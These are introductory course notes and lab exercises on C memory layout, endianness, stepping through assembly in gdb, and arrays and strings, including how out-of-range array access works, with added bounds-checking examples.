int  zz = 206578;
char letter1 = 'v';
char letter2 = 'N';
int  y = 154;

Note:
decimal 206578 is 0x326F2 in hexadecimal
character 'v' is 0x76 in hexadecimal (from the ASCII table)
character 'N' is 0x4E in hexadecimal (from the ASCII table)
decimal 154 is 0x9A in hexadecimal

Suppose that when the program is compiled with gcc, the compiler sets aside storage space in main memory (RAM) for the program and its variables, laying them out starting at the first address in the table below. (The compiler is free to order variables however it likes; in this example y lands at the lowest address, then letter2, then letter1, then zz, the reverse of the order in which they were declared.)

Memory Address   Data at that Memory Address (Hex)
0x08048374
0x08048375
0x08048376
0x08048377
0x08048378
0x08048379
0x0804837A
0x0804837B
0x0804837C
0x0804837D
0x0804837E
0x0804837F
0x08048380
0x08048381

1. How many total bytes are used to store these variables in memory?
Answer: 4 bytes for zz, 1 byte for letter1, 1 byte for letter2, 4 bytes for y: 10 bytes total.

2. What are the actual bit values that will be stored in memory? Give your answer as hexadecimal values.
Answer: Variable zz is an integer, so it is stored in 4 bytes (which is 8 hexadecimal digits); its value looks like 0x000326F2. Variable letter1 is stored in one byte (2 hexadecimal digits); its value looks like 0x76. Variable letter2 is also stored in one byte; its value looks like 0x4E. Variable y is an integer, so it is stored in 4 bytes (8 hexadecimal digits); its value looks like 0x0000009A.

3. How will the values be stored in memory?
Answer: char values occupy one byte, so they are stored as is. int values are stored in "little endian" format, so the least significant byte is stored FIRST (at the lowest address) and the most significant byte is stored LAST, the reverse of the order in which you would write the number. The memory contents are:

Memory Address   Data (Hex)   Variable
0x08048374       9A           y (least significant byte)
0x08048375       00           y
0x08048376       00           y
0x08048377       00           y (most significant byte)
0x08048378       4E           letter2
0x08048379       76           letter1
0x0804837A       F2           zz (least significant byte)
0x0804837B       26           zz
0x0804837C       03           zz
0x0804837D       00           zz (most significant byte)
0x0804837E       10           garbage bits (not part of our variables)
0x0804837F       00           garbage bits
0x08048380       00           garbage bits
0x08048381       A3           garbage bits

4. What are the values and addresses of the variables?
Answer:
y = 154 (which is 0x0000009A in hex), and the address of y is 0x08048374
letter2 = 'N' (which is 0x4E in hex), and the address of letter2 is 0x08048378
letter1 = 'v' (which is 0x76 in hex), and the address of letter1 is 0x08048379
zz = 206578 (which is 0x000326F2 in hex), and the address of zz is 0x0804837A

(The address of a multi-byte variable is the address of its first, lowest-addressed, byte; that is what &y or &zz would give you in C.)

Problems
1.
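The two directions of this exercise (from declared values to bytes in memory, and from a memory dump back to values) can be checked with the following added example, written for these notes rather than taken from them. It packs the four variables into a buffer in the order the table above uses, and then recovers each one from the appendix's dump bytes using a layout table of the kind a debugger builds from the -g information. The dump bytes and addresses are the ones in the table (constructed input); the garbage bytes are left alone.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* The appendix's memory dump: 14 bytes starting at 0x08048374 (constructed
 * from the table above, garbage bytes included). */
#define DUMP_BASE 0x08048374u
static const uint8_t DUMP[] = {
    0x9A, 0x00, 0x00, 0x00,   /* y       */
    0x4E,                     /* letter2 */
    0x76,                     /* letter1 */
    0xF2, 0x26, 0x03, 0x00,   /* zz      */
    0x10, 0x00, 0x00, 0xA3,   /* garbage */
};

/* Where the compiler put each variable and how big it is: this is what a
 * debugger learns from the -g information, and without it a byte in a dump
 * means nothing. */
struct var_desc { const char *name; uint32_t addr; unsigned size; };
static const struct var_desc LAYOUT[] = {
    { "y",       0x08048374u, 4 },
    { "letter2", 0x08048378u, 1 },
    { "letter1", 0x08048379u, 1 },
    { "zz",      0x0804837Au, 4 },
};
#define NVARS (sizeof LAYOUT / sizeof LAYOUT[0])

/* Direction 1: value -> bytes.  Write the low `size` bytes of v at out,
 * least significant first (little-endian).  Returns bytes written. */
unsigned store_le(uint32_t v, unsigned size, uint8_t *out)
{
    for (unsigned i = 0; i < size; i++)
        out[i] = (uint8_t)(v >> (8 * i));
    return size;
}

/* Pack the four variables back to back in table order into buf (at least
 * 10 bytes).  Returns the number of bytes used. */
unsigned pack_variables(uint8_t *buf)
{
    unsigned off = 0;
    off += store_le(154u,    4, buf + off);   /* y       = 154    */
    off += store_le('N',     1, buf + off);   /* letter2 = 'N'    */
    off += store_le('v',     1, buf + off);   /* letter1 = 'v'    */
    off += store_le(206578u, 4, buf + off);   /* zz      = 206578 */
    return off;
}

/* Direction 2: bytes -> value.  Look the name up in the layout, check that
 * the variable lies inside the dump, and combine its bytes low byte first.
 * Returns 1 with the value in *value, or 0 if unknown or outside the dump. */
int recover(const char *name, uint32_t *value)
{
    for (size_t i = 0; i < NVARS; i++) {
        if (strcmp(LAYOUT[i].name, name) != 0) continue;
        if (LAYOUT[i].addr < DUMP_BASE) return 0;
        uint32_t off = LAYOUT[i].addr - DUMP_BASE;
        if (off + LAYOUT[i].size > sizeof DUMP) return 0;   /* truncated */
        uint32_t v = 0;
        for (unsigned b = 0; b < LAYOUT[i].size; b++)
            v |= (uint32_t)DUMP[off + b] << (8 * b);
        *value = v;
        return 1;
    }
    return 0;
}

int main(void)
{
    uint8_t packed[16];
    unsigned n = pack_variables(packed);
    printf("packed %u bytes:", n);
    for (unsigned i = 0; i < n; i++) printf(" %02X", packed[i]);
    printf("  (%s the dump)\n", memcmp(packed, DUMP, n) == 0 ? "matches" : "differs from");
    for (size_t i = 0; i < NVARS; i++) {
        uint32_t v;
        if (recover(LAYOUT[i].name, &v))
            printf("%-7s @ 0x%08X = 0x%0*X (%u)\n", LAYOUT[i].name,
                   (unsigned)LAYOUT[i].addr, (int)(LAYOUT[i].size * 2),
                   (unsigned)v, (unsigned)v);
    }
    return 0;
}
```

The packed bytes reproduce the first ten entries of the table (9A 00 00 00 4E 76 F2 26 03 00), and recover() gives back 154, 'N', 'v' and 206578 from them; change any address in LAYOUT and the recovered values become nonsense, which is the whole lesson of Question 4.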
Examine the following C program and describe the expected output. (Note: count%2 is the remainder of count divided by 2; e.g., 4%2 is 0, while 4%3 is 1.)

#include<stdio.h>
int main()
{
   int count;
   for( count = 1; count <= 4 ; count = count + 1 )
   {
      if( count %2 == 0)
         printf("Echo\n") ;
      else
         printf("Oscar\n") ;
   }
}

2. What exactly will the following C program do after it is compiled and executed?

#include<stdio.h>
int main()
{
   int j;
   for(j = 10; j > 2; j = j - 2)
   {
      printf("Go Navy!\n");
   }
}

3. What is the exact output of the program below if the user enters 5 when prompted?

#include<stdio.h>
int main( )
{
   int number , counter ;
   printf( "Enter a number: " ) ;
   scanf( "%d" , &number );
   if( number != 5 )
      printf( "I love EC310!\n" );
   else
      printf( "What's for lunch?\n" );
   for(counter = number ; counter < 10 ; counter = counter + 3)
      printf( "Navy\n" );
}

4. Consider this screenshot:
(a) What type of language is depicted in the screenshot below?
(b) Describe what this line of code accomplishes.

5. Consider the picture below (two columns: memory address, value stored at this address):
(a) In words: what is held in the eip register, i.e., what is the purpose of this register? (Your answer should not be: "804838d".)
(b) What would be displayed on the monitor by the command x/xb $eip ?
(c) What would be displayed on the monitor by the command x/s 0x08048475 ? (Hint: the string stops at the first byte that reads 0000 0000.)

6. What is the exact output of the following C program if the user enters 4 when prompted to enter a start value?

#include<stdio.h>
int main ()
{
   int start_value , number;
   printf( "Enter a start value: ");
   scanf("%d" , &start_value );
   for( number = start_value ; number != 12 ; number = number + 2 )
   {
      printf("I love cyber!\n");
   }
}

7. Consider again the program shown in Question 6 above. What happens if the user enters 7 when prompted to enter a start value?

8. We would like to write a complete C program that prompts the user to enter an integer.
The program should then provide the absolute value of the integer. See the screen capture below. Fill in the missing code in the two red boxes shown below so that the program executes successfully. Each red box is missing only one line of code!

#include<stdio.h>
int main ()
{
   int value;
   printf( "Enter an integer: ");
   scanf("%d" , &value );
   if( [red box] )
   {
      [red box]
   }
   printf("The absolute value of the number is: %d\n" , value );
}

9. In this problem we are going to use the program named firstprog.c, which is located in the booksrc directory. We need to copy this file to the work directory. First ensure you are in your home directory by entering cd, and then carefully enter the following at the home-directory prompt (the prompt is shown; you type only the cp command):

midshipman@EC310:~ $ cp booksrc/firstprog.c work

Verify that you have firstprog.c in your work directory by changing to the work directory (cd work) and then listing the files in the work directory (ls). You should see the firstprog.c file (along with perhaps some additional files from recent labs). The program firstprog.c is shown below:

#include <stdio.h>
int main()
{
   int i;
   for( i = 0; i < 10; i++ )
   {
      printf("Hello World!\n");
   }
}

Note: i++ means exactly the same thing as i = i + 1.

Compile your program using gcc:

gcc -g firstprog.c

and then run your program:

./a.out

to confirm it executes as expected. Then start the debugger by entering the following commands (hitting ENTER after each command):

gdb -q ./a.out
set dis intel
list
disassemble main
break main
run

(a) The program has now stopped at the first line of code after the line int main( ). Recall that the eip register holds the address of the next instruction that will be executed. What is the address stored in the eip register?
(b) What is the next assembly language instruction that will be executed?
(c) Consider the assembly language instruction mov DWORD PTR [ebp-4],0x0. This instruction places the value 0 into the memory location whose address is ebp-4. Enter nexti to execute this instruction. What is the value of ebp?
(d) What is the value of ebp-4?
(e) What is stored at the address ebp-4? Hint: use x/xw with your answer to question (d).
(f) Look at the value of the instruction pointer (eip). Has it changed from your answer to part (a)? Why or why not?
(g) The next assembly language instruction that will be executed is cmp DWORD PTR [ebp-4],0x9. This instruction compares the value you examined in question (e) with the value 9. Referring back to the C source code, what do you think this assembly language instruction is doing? Enter nexti to execute this instruction.
(h) The assembly language instruction that will be executed next is jle 0x8048393 <main+31>. This instruction means: if the preceding comparison showed that the value stored at address ebp-4 was less than or equal to 9, jump to address 0x8048393. Enter nexti once. What is the value of the eip register? If your answer to (h) is not 0x8048393 then you have gone off the rails! STOP! See your instructor (or MGSP).
(i) Explain, in words, why the instruction pointer has the value that it has.
(j) The assembly language instruction mov DWORD PTR [esp],0x8048484 moves the value 0x8048484 into the location pointed to by the stack pointer. Enter nexti once. What is the address stored in the stack pointer (esp)?
(k) What is stored at the memory location whose address is in the stack pointer? (Hint: use x/xw to examine the value stored at the address specified by the stack pointer.)
(l) We would like to know the significance of the address 0x8048484. What is stored at this location? (Hint: examine the first four bytes stored starting at this memory location... think ASCII... could this be a string?)

10.
Consider the following C program.

#include<stdio.h>
int main()
{
   int i;
   for( i=0; i < 4; i=i+2 )
   {
      if( i >= 2 )
      {
         printf("Torpedoes\n");
      }
      else
      {
         printf("Howitzer\n");
      }
   }
}

(a) State how many times the loop will iterate.
(b) What will be printed to the screen when the program is executed?

11. Answer the following questions based on the screen capture below of assembly code in the debugger.
(a) Part of the source code that generates this assembly code is the line int x = 5; Which assembly language instruction corresponds to this C code?
(b) What is the memory address (in hexadecimal) of the variable x?
(c) What is the address of the next line of code to be executed?

Security Exercise 3

Part 1: Initial Set-up
Open VMware and power on the EC310 virtual machine. You should be in your home directory. List the various files and directories using ls. You should see: (screen capture). Shown pictorially, the files and directories under your home directory look like this: (figure).

Your instructors have prewritten many of the C programs you will need for EC310, and have placed them in the ec310code directory. We have done this because we care. In fact, as you are no doubt already aware, the ECE Department is known universally as The Caring Department. As you progress through the course, you should ensure the programs you are working on are located in your work directory. The program you will use today is named sx3.c and it is in the ec310code directory. We need to copy this file to the work directory. To copy the file named sx3.c from the ec310code directory to the work directory, make sure you are at your home directory and carefully enter the following at the prompt (the prompt is shown; you type only the cp command):

midshipman@EC310:~ $ cp ec310code/sx3.c work

If all went well, you should have a copy of sx3.c in your work directory.
Verify that you have sx3.c in your work directory by changing to the work directory (cd work) and then listing the files in the work directory (ls). You should see the sx3.c file (along with perhaps some additional files from last lab). If you do not have sx3.c in your work directory, STOP and ask your instructor or lab tech for help. Otherwise, proceed to Part 2.

I'm a famous USNA grad. Don't you see the light? Who am I?

Part 2: Running the C Program
You should now be in the work directory. Examine the program sx3.c using nano (i.e., type in: nano sx3.c). The C program is shown below:

#include<stdio.h>
int main( )
{
   int x;
   x = 5;
   if( x == 4)
      printf( "Army\n");
   else
      printf("Navy\n");
}

Note that this is a silly program, because it is designed to always print out Navy. In other words, this program has no need for an if-else statement. We have intentionally written the program this way to give you practice traipsing through memory. Save the program by entering Control-o (where that is the letter o, not the number 0), saving the file under its current name, and exit nano by entering Control-x. Compile your program using gcc:

gcc -g sx3.c

and then run your program:

./a.out

to confirm it executes as expected. If your program is not working, STOP and ask your instructor or lab tech for help. Otherwise, proceed to Part 3.

Part 3: Program Autopsy: Case 2
Set up the debugger by entering:

gdb -q ./a.out

After you press ENTER, you should see a line of gobbledygook (Using host libthread...) and then the prompt should change to (gdb), indicating that you are using the debugger. Continue by entering the following commands (hitting ENTER after each command):

set dis intel
list
disassemble main
break main
run

Here is a screen capture of the assembly code you should see; the program has stopped at the breakpoint marked in it. The line

Breakpoint 1 at 0x8048384: file sx3.c, line 5.
means, in English: the next instruction that will be executed (but has not yet been executed) is stored at address 0x8048384. If we look for this address in the top part of the assembly code, we quickly find it.

Question 1: From the picture above, what should be the current value of the instruction pointer (i.e., what address is stored in the instruction pointer)? Verify your answer by inspecting the value of the instruction pointer by entering: i r eip

Question 2: What is the next assembly language instruction that will be executed (but has not yet been executed)?

Look at the line of code: mov DWORD PTR [ebp-4],0x5. What is this assembly language code trying to accomplish? In English, this assembly language instruction is saying: place the value 5 in main memory at the location that has the address ebp-4. Recall that ebp is one of the CPU's registers. Specifically, ebp points to one end of the region in main memory that the program has available to store the variables and values that it needs. Again: ebp holds an address. Whatever value is in ebp, the value of ebp-4 will be the address four bytes earlier (numerically lower) than ebp. So, the instruction mov DWORD PTR [ebp-4],0x5 would place the value 5 in the memory location specified by ebp-4.

Question 3: In my illustrative example above, where I entered the value 5 into address baaaa810, why did I block out (in blue) four bytes of memory?

Recall that our C program is:

#include<stdio.h>
int main( )
{
   int x;
   x = 5;
   if( x == 4)
      printf( "Army\n");
   else
      printf("Navy\n");
}

And the next assembly language instruction that will be executed (but has not yet been executed) is: mov DWORD PTR [ebp-4],0x5

Question 4: What line(s) of C code does this assembly language correspond to?

Now, execute one line of machine code, the line above, by entering nexti. So... you have just executed the instruction mov DWORD PTR [ebp-4],0x5.

Question 5: Examine the assembly language code shown two pages back.
What values do you expect to be stored in the instruction pointer? Verify your answer by examining the value of eip. (You know how to do this! i r eip.)

If your answer to Question 5 did not end in the hexadecimal number b, then STOP and ask your instructor or lab tech for help. Otherwise, proceed to Part 4.

Part 4: Program Autopsy Continued

Recall that the assembly language instruction you recently executed, mov DWORD PTR [ebp-4],0x5, places the value 5 in the memory location specified by ebp-4. Let's see if this is accurate!

Question 6: What is the value stored in ebp?

Question 7: What is the value of ebp-4?

Question 8: Examine memory to determine what is stored in the address specified by ebp-4. Use the examine command: x/x followed by the address you want to examine. For example, if you want to look at the contents of memory location 0xbffff800 you would enter:

    x/x 0xbffff800

Question 9: In the picture below, which shows a section of the stack, fill in the value of ebp, write the addresses next to all memory locations, and fill in the values stored in those locations. Specifically, fill in the hex value corresponding to the byte stored at each memory location shown in the diagram. (This picture is also replicated on your answer sheet.)

(Figure: a section of the stack, to be filled in.)

Now look at the next line of code that will be (but has not yet been) executed:

    cmp DWORD PTR [ebp-4],0x4

In x86 assembly language, cmp means compare. Specifically, this line of code is comparing the value stored at the address ebp-4 to the value 4.

Question 10: Are the two values (the value stored at location ebp-4 and the integer 4) equal to each other or not equal to each other?

Question 11: Look again at your C program. What portion of the C code do you think the assembly language instruction cmp DWORD PTR [ebp-4],0x4 corresponds to?

Now, execute one line of code by entering nexti. You have just executed the instruction:

    cmp DWORD PTR [ebp-4],0x4
Question 12: By looking at the value stored in the instruction pointer, and by looking at the assembly language code shown a few pages back, what is the next line of assembly code that will be executed (but has not yet been executed)?

If your answer to Question 12 did not end in the hexadecimal number f, then STOP and ask your instructor or lab tech for help. Otherwise, proceed to Part 5.

Part 5: Program Autopsy Continued Continued

Look at the instruction:

    jne 0x804839f

In x86, jne stands for jump if not equal. Recall that the preceding instruction did a comparison, and, based on the results of the comparison, we will have one of two answers: "Yes, the two items that were compared are equal" or "No, the two items that were compared are not equal." So the line of code

    jne 0x804839f

means, in English: If the two items we just compared are not equal, jump to the instruction at address 0x804839f. Otherwise (if the items were equal), just continue with the next instruction in sequence.

Question 13: Do you expect that after we execute the assembly language instruction jne 0x804839f the CPU will jump to 0x804839f as the next instruction? Explain.

Now, execute one line of code by entering nexti. This will execute the line:

    jne 0x804839f

Question 14: What is the new value of the instruction pointer? Explain.

Question 15: What is the next line of assembly language code that will be executed? (Look at the address in the eip register and find the corresponding assembly language instruction.)

Let's examine the assembly language instruction:

    mov DWORD PTR [esp],0x804848a

This essentially says: The register esp holds an address. Place the value 0x804848a in the location specified by this address. So, for example, if esp holds the address 56, then this will place the value 0x804848a in memory location 56. Execute this instruction by entering nexti.

Question 16: The picture below shows a portion of the program's stack in main memory.
Notice that the value 5 is stored at addresses bffff814 through bffff817. Complete the picture by filling in the value of the stack pointer (esp) as well as the contents of memory locations bffff810 through bffff813. Note that this figure is replicated on your answer sheet.

(Figure: a portion of the stack, to be completed.)

STOP. Show your instructor or lab tech your answer to Question 16. Then proceed to Part 6.

Part 6: Be a Hacker!

Our program is very interested in the address 0x804848a. It took the time to store this value on the stack, and the stack is used to store information the program needs to successfully execute.

Question 17: Investigate what is so special about address 0x804848a. Look inside this address using the x/x command. Be a sleuth! Why does this address matter? (Hint: there are characters stored there!)

The remaining part of the program simply prints the string of characters at address 0x804848a to the monitor.

To exit out of the debugger, enter: quit. When you are asked:

    The program is running. Exit anyway? (y or n)

select y.

Part 7: EXTRA CREDIT Program Autopsy: Case 3

Using nano, change your C program by replacing the line

    x = 5;

with the line

    x = 4;

Then run the program line-by-line in the debugger (gdb) as before.

Question 18: Your first breakpoint was at main. As you execute the program by repeatedly entering nexti, what is the first line of assembly language that is executed in this program that was not executed in the prior program?

Question 19: What is the significance of the number 0x8048484 which appears in the assembly code?

Security Exercise 3 Answer Sheet

Name:

Question 1:
Question 2:
Question 3:
Question 4:
Question 5:
Question 6:
Question 7:
Question 8:
Question 9:
Question 10:
Question 11:
Question 12:
Question 13:
Question 14:
Question 15:
Question 16:
Question 17:

EXTRA CREDIT
Question 18:
Question 19:

Chapter 4: Arrays and Strings

Objectives:
(a) Describe how an array is stored in memory.
(b) Define a string, and describe how strings are stored.
(c) Describe the implications of reading or writing beyond the boundary of an array.
(d) Describe how to change the values of individual array elements.

1. Arrays

1.1. Why Use Arrays?

Consider the following problem: Suppose an instructor has just finished grading the six-week exams for the twenty midshipmen in her section of EC310. Write a C program that will compute the average and also determine how far each student's individual grade is from the average.

One way to start this program would be to declare twenty variables to hold the twenty grades:

    float student1_grade, student2_grade, student3_grade … etc., etc.

This is cumbersome. All these variables! Ugh. Suppose there were 100 students in the section. We would need 100 variables to hold the 100 grades.

Suppose we consider a different (better!) approach. Instead of having 20 separate variables to hold our 20 six-week exam scores, we will use a "large box with multiple slots." We might name the entire large box six_week_grade. The top slot will hold the first student's six-week exam grade, the second slot will hold the second student's six-week exam grade, and so forth. Instead of using the term "large box with multiple slots", let's call this an array. In C, an array is frequently also termed a buffer.

(Figure: a box with slots labelled "First student's grade goes here", "Second student's grade goes here", "Third student's grade goes here", and so on.)

So that we can more easily draw our arrays, we will imagine that our section has five students. The concepts will, of course, apply to arrays of any size. Let's say, for the purposes of this discussion, that our five students, Mid 1, Mid 2, Mid 3, Mid 4 and Mid 5, have grades of 98, 87.5, 94, 90 and 92, respectively.

1.2. Arrays

An array is a collection of data, all of the same type. Recall that when we say type we are referring to int, float or char. More precisely, an array is a consecutive group of memory locations, all with the same name, all holding the same type of data.
Our array of five student grades (all of type float) might be arranged in main memory as:

(Figure: five consecutive memory locations, four bytes apart, labelled "First student's grade goes here" through "Fifth student's grade goes here", with ellipses above and below the array.)

Notice first that our five array elements are stored in consecutive memory locations. Second, note that the addresses are separated by four bytes, since each value of type float is stored in four bytes. The precise location in main memory where the array will be stored is determined by the compiler. You might be surprised to know that the third and most important point to note in the figure above are the ellipses (i.e., the three dots) shown at the top and bottom of the array! There are items in main memory "above" our array, and items in main memory "below" our array.

Suppose we want to give our array the name six_week_grade. Recalling that our array will hold five grades, each of type float, we can declare our array as:

    float six_week_grade[ 5 ] ;

More generally, the syntax for declaring an array is

    type array_name [ number of items in the array ] ;

where:

    type: All items stored in the array must be of the same type.
    array_name: Same rules as for variable names.
    number of items in the array: Also called the "size" of the array; must be an integer or an expression that evaluates to an integer.

The following would all be valid examples of array declarations:

    float temperatures[31];
    int calories[90];
    float migraine_intensity_level[1000];

Returning to our example, when we first declare our array as

    float six_week_grade[ 5 ] ;

the compiler will reserve adjacent memory for five variables of type float. The entire array will be named six_week_grade. The picture would look like this (where the exact addresses are chosen by the compiler):

(Figure: five adjacent four-byte memory locations reserved for six_week_grade.)

The values stored in these memory locations are, presently, "garbage values".

Note that when we declare an array, the size of the array can be a variable, so long as the variable has a value that is known.
The following code is perfectly fine, and would produce the same array as that shown above:

    int number_in_class = 5 ;
    float six_week_grade[ number_in_class ] ;

This will work since by the time we reach the declaration for the array

    float six_week_grade[ number_in_class ] ;

the value of the size of the array (the variable named number_in_class) is already explicitly known from a prior declaration that has already been encountered:

    int number_in_class = 5 ;

Practice Problem 4.1
Write a declaration that could be used to hold the individual letter grades for 250 midshipmen.
Solution:

Obviously, we do not want garbage values in our array. How do we get our student grades into this array?

1.3. Array Elements

The individual elements in the array are variables. Each individual memory location in the array is indexed by a position number in the array. In our array named six_week_grade, the individual variables in the array (i.e., the variables that will hold the 5 individual six-week scores) are indexed from 0 to 4. The index is placed in square brackets after the array name. So, the name of the first variable in the array is six_week_grade[0], the name of the second variable in the array is six_week_grade[1], and so forth.

The individual array elements are variables and can be used in expressions just as you would ordinarily use any variable. So, for example, the line of code

    six_week_grade[ 2 ] = 94 ;

would change our picture to this:

(Figure: the array with 94 stored in the third slot, six_week_grade[2].)

So, the third midshipman's grade, which we refer to as six_week_grade[ 2 ], is now stored in the array. (The other four array values are still garbage values.)

Important point guaranteed to cause confusion: Note that the first variable in the array has an index of zero, not one. This is counter-intuitive. In the above example, you would think that the first six-week exam grade should be indexed as six_week_grade[1] since, after all, it is the first score. You would be wrong!
The first score in our array of scores is indexed as six_week_grade[0]. Most programming languages (e.g., C, C++, Java, JavaScript) start with the index at zero just to make it easier for the CPU to index into the array.

We could fill in our array in memory by adding the lines of code:

    six_week_grade[ 0 ] = 98 ;
    six_week_grade[ 1 ] = 87.5 ;
    six_week_grade[ 3 ] = 90 ;
    six_week_grade[ 4 ] = 92 ;

after which our array is stored as shown:

(Figure: the array with 98, 87.5, 94, 90 and 92 stored in its five slots.)

It bears repeating: The individual array elements are variables and can be used in expressions just as you would ordinarily use any variable.

If we wanted to add two points to the first midshipman's grade we could use

    six_week_grade[ 0 ] = six_week_grade[ 0 ] + 2 ;

If we wanted to read the value of the third midshipman's grade in from the keyboard, we could use

    scanf( "%f" , &six_week_grade[ 2 ] );

If we wanted to print the second midshipman's grade to the monitor, we could use

    printf( "%f" , six_week_grade[ 1 ] );

We can use array elements in Boolean expressions, such as

    if ( score[3] > 90 ) ....

Note that when referring to an array element, the index does not need to be an integer constant. We can use any expression in the brackets that evaluates to an integer. As an example, the for loop below might be used to read in from the keyboard the grades for 5 students.

    for ( number = 0 ; number < 5 ; number = number + 1 )
    {
        printf( "Enter score for student %d : " , number + 1 );
        scanf( "%f" , &six_week_grade[ number ] );
    }

Practice Problem 4.2
Suppose we have 5 students in EC310. A portion of a C program that declares an array of floats named six_week_grade that will hold the midterm grades for the class is shown below. Your program should allow the user to enter the midterm grades at runtime, and should then print out the midterm grades. Your program output should appear as shown below:

(Screen capture of the expected program output.)

Fill in the one missing line of code.
    #include <stdio.h>

    int main()
    {
        float six_week_grade[5];
        int number ;

        for ( number = 0 ; number < 5 ; number = number + 1 )
        {
            printf( "Enter score for student %d : " , number + 1 );
            scanf( "%f" , &six_week_grade[ number ] );
        }

        for ( number = 0 ; number < 5 ; number = number + 1 )
        {

        }
    }

Practice Problem 4.3
Consider an array declared as

    float pay[4];

(a) How much memory is reserved for this array?
Solution:
(b) What are the four variables that are collected into this array?
Solution:
(c) What is the name of the array of four variables?
Solution:
(d) If the first array element is stored at address 0x0000008e, what is the address of the second element?
Solution:

1.4. Initialization of Arrays

It is possible to initialize the values of an array in the array's declaration. To initialize arrays in the declaration, we place the initial values in braces, and separate the values with commas. Our array of student grades could have been initialized by the declaration:

    float six_week_grade[ 5 ] = { 98 , 87.5 , 94 , 90 , 92 };

There are some caveats to this:

First, if we initialize only the first part of an array, the remaining elements are initialized to zero. For example, the declaration

    float six_week_grade[ 5 ] = { 98 , 87.5 };

has the exact same effect as

    float six_week_grade[ 5 ] = { 98 , 87.5 , 0 , 0 , 0 };

The second caveat: If you initialize an array when it is declared, you can omit the array size. The size will be set permanently to the minimum size needed to store the initialization values. So, for example, the array declaration

    float six_week_grade[ 5 ] = { 98 , 87.5 , 94 , 90 , 92 };

is the same as the declaration

    float six_week_grade[ ] = { 98 , 87.5 , 94 , 90 , 92 };

When dealing with arrays, you must note that we use the square brackets [ and ] in two different ways:

In the array declaration, the number in the square brackets gives the size of the array (i.e., the number of items in the array). This value must be known when the array is declared.
Anywhere outside the declaration, the number in the square brackets tells which element in the array (the specific variable) we are referring to.

After six pages of array syntax, you might be thinking: "Wonderful, so what?" As we will see, arrays have a horrendous security vulnerability baked into them.

1.5. The Dreaded Out-of-Range Error

C will not prevent you from trying to access an array element that is out of the array's range. Stated another way, C will not prevent you from trying to read from or write to "nonexistent" array elements. What exactly does this mean? Consider the array declaration

    int salary[3];

which declares an array with three variables: salary[0], salary[1] and salary[2]. But what happens if we have a statement such as

    printf( "%d" , salary[3] );

when there is no variable salary[3]? Let's see! Consider the program below.

    #include <stdio.h>

    int main()
    {
        int salary[3] = { 1000 , 1500 , 2000 };
        int j;

        for ( j = 0 ; j <= 3 ; j = j + 1 )
        {
            printf("Salary %d is %d \n" , j+1 , salary[j] );
        }
    }

The output from this program is:

(Screen capture of the output: the three salaries, followed by a fourth, unexpected number.)

No compilation error results in the program above... but do you see the potential dangers? Where does the last number come from? The answer: It is the value that is located in memory immediately after salary[ 2 ]! This is a garbage value.

When we index an array variable using an index outside the range of indices specified in the array's declaration, we commit an "out-of-range error." Again, it is critical to note that C will not prevent you from looking into memory beyond the end of your array.

What would be the danger in the following program snippet?

    float salary[3];
    int j;

    (other code not shown)

    for ( j = 0 ; j <= 3 ; j = j + 1 )
    {
        printf("Enter salary %d: ", j + 1 );
        scanf( "%f" , &salary[j] );
    }

    (more code)

The program above does not produce any compilation errors, but running this program is potentially very dangerous. Do you see why?
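As an added example (not part of the EC310 notes), here is the salary loop from above rewritten so that every array access goes through a bounds check that C itself will never perform; the accessor names, the probe functions and the sample salary values are constructed for this illustration.

```c
#include <stdio.h>
#include <stdbool.h>
#include <stddef.h>

#define NUM_SALARIES 3

/* Reads salary[idx] into *out, but only if idx names a real element.
 * C would happily read salary[3]; this function refuses to. */
bool get_salary(const int *salary, size_t len, size_t idx, int *out)
{
    if (idx >= len) {
        return false;       /* out-of-range index: nothing is read */
    }
    *out = salary[idx];
    return true;
}

/* Writes value into salary[idx] under the same rule, so that no write can
 * land in whatever variable happens to sit after the end of the array. */
bool set_salary(int *salary, size_t len, size_t idx, int value)
{
    if (idx >= len) {
        return false;       /* out-of-range index: memory is left untouched */
    }
    salary[idx] = value;
    return true;
}

/* Builds the three-element array from the text and reads index idx through
 * get_salary. Returns the salary, or -1 when the index was refused. */
int probe_salary(size_t idx)
{
    int salary[NUM_SALARIES] = { 1000, 1500, 2000 };   /* constructed sample */
    int value;

    if (!get_salary(salary, NUM_SALARIES, idx, &value)) {
        return -1;
    }
    return value;
}

/* Runs the text's loop (j from 0 through 3, off-by-one included) with the
 * checked accessor instead of salary[j]. Returns the number of iterations
 * that were refused; with a 3-element array that is exactly 1. */
int run_salary_loop(void)
{
    int salary[NUM_SALARIES] = { 1000, 1500, 2000 };   /* constructed sample */
    int refused = 0;
    size_t j;

    for (j = 0; j <= NUM_SALARIES; j++) {
        int value;
        if (get_salary(salary, NUM_SALARIES, j, &value)) {
            printf("Salary %zu is %d\n", j + 1, value);
        } else {
            printf("Salary %zu: index %zu is out of range (array has %d elements)\n",
                   j + 1, j, NUM_SALARIES);
            refused++;
        }
    }
    return refused;
}

/* Attempts the out-of-range write salary[3] = 9999 through set_salary and
 * reports whether it was refused with the real elements left unchanged. */
bool write_past_end_is_refused(void)
{
    int salary[NUM_SALARIES] = { 1000, 1500, 2000 };   /* constructed sample */
    bool accepted = set_salary(salary, NUM_SALARIES, NUM_SALARIES, 9999);

    return !accepted && salary[0] == 1000 && salary[1] == 1500 && salary[2] == 2000;
}

int main(void)
{
    run_salary_loop();
    printf("write past end refused: %s\n", write_past_end_is_refused() ? "yes" : "no");
    return 0;
}
```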
Notice that the for loop, in its final iteration, attempts to enter a value into a variable named salary[3]. There is no variable named salary[ 3 ]! The program will simply write over whatever was stored in the memory location following salary[ 2 ].

We now switch gears (slightly) and talk about arrays of characters—that is, arrays where each element in the array is of type char.

2. Strings

2.1. Introduction

Suppose the contents of 5 consecutive bytes in computer memory are as follows:

    0100 1110
    0110 0001
    0111 0110
    0111 1001
    0000 0000

As ASCII characters, this is the same as:

    'N' 'a' 'v' 'y' 0

Note that 0 is the NULL character. In C, a string of characters is a NULL-terminated sequence of characters.

2.2. String literals

A literal is similar in notion to a constant. For example, the integer 5 is a literal. The float value 3.1416 is a literal. We can have string literals as well. A string literal is written as a list of characters enclosed within double quotes. For example, "Navy" is a string literal. Although the length of the string is 4 (the 4 characters 'N', 'a', 'v' and 'y'), it takes 5 bytes to store this string in memory. This is because the NULL character has to be included for C to treat the collection of characters as a string.

2.3. String variables

In C, strings—i.e., sequences of characters—are stored as arrays of characters. Here is an example of declaring a string variable using a character array:

    char school[5] = "Navy";

